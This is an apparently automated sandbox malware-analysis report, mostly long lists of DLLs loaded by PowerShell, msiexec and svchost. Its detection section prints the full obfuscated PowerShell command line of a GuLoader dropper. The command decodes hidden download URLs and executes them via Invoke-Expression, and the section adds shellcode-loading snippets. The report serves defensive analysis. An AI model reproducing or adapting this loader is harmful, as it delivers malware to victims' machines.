                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: amsi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\SysWOW64\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netapi32.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cscapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: qmgr.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsperf.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: powrprof.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: xmllite.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: firewallapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: esent.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: umpdc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dnsapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntmarta.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: flightsettings.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: policymanager.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msvcp110_win.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netprofm.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: npmproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsigd.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: upnp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ssdpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: appxdeploymentclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmauto.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wsmsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dsrole.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: pcwum.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: webio.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: es.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dllJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\dllhost.exeSection loaded: cryptbase.dllJump to behavior
                        Source: C:\Windows\System32\dllhost.exeSection loaded: iphlpapi.dllJump to behavior
                        Source: C:\Windows\System32\dllhost.exeSection loaded: mswsock.dllJump to behavior
                        Source: C:\Windows\System32\dllhost.exeSection loaded: dhcpcsvc.dllJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
                        Source: Window RecorderWindow detected: More than 3 window changes detected
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dllJump to behavior
                        Source: Binary string: \??\C:\Windows\dll\System.Management.Automation.pdb source: powershell.exe, 00000005.00000002.1951933890.0000000007C0B000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernel32.pdb source: msiexec.exe, 0000000A.00000003.2012206135.0000000022B10000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2012001791.00000000229F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: tem.Core.pdb source: powershell.exe, 00000005.00000002.1951933890.0000000007C84000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: indows\System.Core.pdb source: powershell.exe, 00000005.00000002.1951933890.0000000007C84000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdb source: msiexec.exe, 0000000A.00000003.2012533041.00000000229F0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2012882600.0000000022C10000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdb source: msiexec.exe, 0000000A.00000003.2009854611.00000000229F0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2010288329.0000000022BE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: System.Management.Automation.pdb-2476756634-1002_Classes\WOW6432Node\CLSID\{1B1CAD8C-2DAB-11D2-B604-00104B703EFD}\InprocServer32. source: powershell.exe, 00000005.00000002.1951933890.0000000007C84000.00000004.00000020.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdbUGP source: msiexec.exe, 0000000A.00000003.2011541543.0000000022B90000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2011234761.00000000229F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: ntdll.pdbUGP source: msiexec.exe, 0000000A.00000003.2009854611.00000000229F0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2010288329.0000000022BE0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wntdll.pdb source: msiexec.exe, 0000000A.00000003.2011541543.0000000022B90000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2011234761.00000000229F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: win32u.pdb source: wmpnscfg.exe
                        Source: Binary string: wkernel32.pdbUGP source: msiexec.exe, 0000000A.00000003.2012206135.0000000022B10000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2012001791.00000000229F0000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: wkernelbase.pdbUGP source: msiexec.exe, 0000000A.00000003.2012533041.00000000229F0000.00000004.00000001.00020000.00000000.sdmp, msiexec.exe, 0000000A.00000003.2012882600.0000000022C10000.00000004.00000001.00020000.00000000.sdmp
                        Source: Binary string: CallSite.Targetore.pdb source: powershell.exe, 00000005.00000002.1951933890.0000000007BC9000.00000004.00000020.00020000.00000000.sdmp

                        Data Obfuscation

                        barindex
                        VBScript performs obfuscated calls to suspicious functions
                        Source: C:\Windows\System32\wscript.exeAnti Malware Scan Interface: powershell ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100=", "Unsupported parameter type 00000000")
                        Yara detected GuLoader
                        Source: Yara matchFile source: 0000000A.00000003.2013688263.00000000056E5000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1961051493.000000000ABA5000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1960598330.0000000008EF0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.1936823765.000000000628B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000003.00000002.1820309274.000002241006F000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        .NET source code contains potential unpacker
                        Source: 12.3.svchost.exe.13e03cbc070.2.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 12.3.svchost.exe.13e03cbc070.2.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Source: 12.3.svchost.exe.13e03cbc070.1.raw.unpack, Runtime.cs.Net Code: CoreMain System.Reflection.Assembly.Load(byte[])
                        Source: 12.3.svchost.exe.13e03cbc070.1.raw.unpack, Runtime.cs.Net Code: CoreMain
                        Found suspicious powershell code related to unpacking or dynamic code loading
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Unbarbarous)$GLoBAL:bRIGitT = [sYSTeM.teXT.enCoding]::AScii.GETSTrIng($uNiverSaLStRmFOrsYnINGer)$glOBAl:stiknaRKOManeRNEs=$BrIGITT.SUbstRing($OVerMALinG,$BRuDFlADeRNe)<#Modstykker Op
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: GetDelegateForFunctionPointer((Fab $Squamosis $Insolubly), (Rundskaaret @([IntPtr], [UInt32], [UInt32], [UInt32]) ([IntPtr])))$global:Hewett = [AppDomain]::CurrentDomain.GetAssemblies()$global:Lavning
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: DefineDynamicAssembly((New-Object System.Reflection.AssemblyName($Pekunire)), $Tabernakelspyrases).DefineDynamicModule($Esselen, $false).DefineType($Stttemedlem, $Sycophantical, [System.MulticastDeleg
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeAnti Malware Scan Interface: FromBase64String($Unbarbarous)$GLoBAL:bRIGitT = [sYSTeM.teXT.enCoding]::AScii.GETSTrIng($uNiverSaLStRmFOrsYnINGer)$glOBAl:stiknaRKOManeRNEs=$BrIGITT.SUbstRing($OVerMALinG,$BRuDFlADeRNe)<#Modstykker Op
                        Suspicious powershell command line found
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (Marescha
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN t';$Partisk=Mareschal 'OrhSptNot Rp.nsUn: ./tr/.pwVawHywsp.b pAftfrs.a.ungHerEmo u CpS,/.daMebG /K iV nPhfOvaPunF.tPhrTiyGlm Eeudn b.Ocd,peMep Ulo.o .y a>AlhSptS t op.fsac: r/K,/BawCiwskwSu.lupSku En Se testt ,.C aBeeUp/D ad,bKo/M iRanfaf Uason Bt .runy mSue ,n F.Hads.eAnpR lOkoSvy';$Hovedets=Mareschal 'T,>';$Underporch=Mareschal 'N i Se KX';$Kuldioxidets='Strateg';$Debatsidens='\Quaiches.Arg';Dilemmatically (Mareschal 'B $P GLeL.poNeB aA BLSk:Hoa eUdRSsa T deSm=U $,aeP nCaVR :Raa PFrPTadBeA uT uaCe+Sk$ .d HEFaB ADeTTos,ri,kdSiEInNBiS');Dilemmatically (Mareschal 'ge$.eG lAfO .bKnaAwlRy:S c ,hPaAAfp RLN.eFuSS SJo= ,$R pC AD RE tU.iAgSPeK . os ePFol OiPaTDe( o$Reh aoFoVInELsd E,fT hsTr)');Dilemmatically (Mareschal $Underleverancer);$Partisk=$Chapless[0];$bibbed=(Mareschal ' S$ eGFoLTmOUdbAdaUnL O: ,PMyi.icD tPru fRBoIFezInaCoT CIWaORenA,s H=LenKlE .w A-Ovo tbSpjShE.vC,uTNi RySSoyS s ptUde ,m o.n $AnL,aAanNFecDiIC,f eETir nOSmuSus e2 o1 g1');Dilemmatically ($bibbed);Dilemmatically (Mareschal ' T$O,P ,iRuc,itMuuL rAbiS z Ia.etG.iHoo n s .AlH.ee laHedSae ,rNosu [V $PoA PmOvb WiT.g uGriKotRueSht.knV,tKorP aDapT sSpy Ic.dhFii fcJuaInl G]M.=r $UnB LaTilFolKneUnlSusF sM.e PrPieGas');$Instrumenter=Mareschal ' H$SnP istcLet euC.rFuiR z BaInt Di Ao inLss C.,rDS oLywSvnU l .oAba ydTaFU.iAblD,e ( I$PlPMya BrAntRai Gs ,kJ ,Ro$ReFa,o,er ,nPrjFleMidGeeInsSy)';$Fornjedes=$Aerate;Dilemmatically (Mareschal 'fr$BrgLaLPeOFrBunA ,l ,: rvL.I rSpU TS ISS EGlN TS,u=Fr(Idt ,e TsbetBo-pepAnA .TDoh f W$GofPioAfRBln JB E dKoEBrSEn)');while (!$Virussens) {Dilemmatically (Mareschal 'Ov$ ngEtl Co obS,aBal B: uAFinMaa lgMir DaB mFem aaFrtAdi sPreFo= $ iANimSlbAliC g KuH i FtV ePrtBanMudBrsGekR yT.d eFll rssue 2,o3 F6') ;Dilemmatically $Instrumenter;Dilemmatically (Marescha
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Skonnert='Privatest';;$Unpresumed='Revisionsarbejdes';;$Printede='Anamniotic';;$Erkendtligheden100='Petrolic38';;$Dybvandet=$host.Name;function Mareschal($Fibrillation){If ($Dybvandet) {$Jewbush=2} for ($Ambiguitet=$Jewbush;;$Ambiguitet+=3){if(!$Fibrillation[$Ambiguitet]) { break };$Klkning+=$Fibrillation[$Ambiguitet];$Cebian207='Motorcades'}$Klkning}function Dilemmatically($brynskov){ .($Underporch) ($brynskov)}$Lanciferous211=Mareschal 'SvNH e TBl..nW';$Lanciferous211+=Mareschal 'EreS BKic Lu ISyeUnnstT';$Ballelsseres=Mareschal 'plMLeoP zGli ilDel ta U/';$Jibbing=Mareschal ' WT FlSisPa1 a2';$Underleverancer='Me[HjnLee bT B.OvS e,frK v Hi dcpse RPCooBeIHunintR.M HAFlnImaPag,gEMiR ,] t:Te:PrsoueL CR,uF,R i EtOvySuPMiRfoo Nt To JC ,O l B=T $ ijHeI mb B BI kNS g';$Ballelsseres+=Mareschal 'Fo5In. C0I S(S W niAnnTadH.o.hwFosdi UaNA.TE .1R,0Re.Lu0Pa;.r DW iUnn A6,r4C,;Pe LxSi6 U4No;Ud BnrM vCr:A 1Hi3 1 P.Sk0O.)Se ,hGRee c .kpeog / I2Pa0Ju1.r0Sk0Sy1Vg0W,1Tt UgFCriBer Bem fEkospxTi/Ep1Th3Sa1 M. k0';$Ambiguitetntrapsychical=Mareschal 'UbuJos AeUnrNa-isaLiG HeJeN 